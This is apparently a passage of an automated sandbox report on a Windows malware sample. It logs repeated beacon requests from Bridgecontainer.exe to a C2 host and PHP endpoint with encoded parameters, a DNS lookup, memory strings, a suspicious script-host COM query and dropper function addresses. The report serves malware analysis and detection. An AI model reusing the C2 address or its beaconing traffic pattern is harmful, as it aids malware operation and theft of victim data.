bJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: f1069581.xsph.ru

Source: Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002D63000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f1069581.xsph.ru
Source: Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f1069581.xsph.ru/
Source: Bridgecontainer.exe, 00000005.00000002.4473483339.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002D63000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f1069581.xsph.ru/L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr
Source: Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

Code function: 0_2_0059718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_0059718C

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_0059857B	0_2_0059857B
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_0059407E	0_2_0059407E
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005BD00E	0_2_005BD00E
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005A70BF	0_2_005A70BF
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005C1194	0_2_005C1194
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005B02F6	0_2_005B02F6
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_00593281	0_2_00593281
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_0059E2A0	0_2_0059E2A0
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005A6646	0_2_005A6646
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005B070E	0_2_005B070E
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005B473A	0_2_005B473A
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005A37C1	0_2_005A37C1
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005927E8	0_2_005927E8
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_0059E8A0	0_2_0059E8A0
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_0059F968	0_2_0059F968
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005B4969	0_2_005B4969
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005A6A7B	0_2_005A6A7B
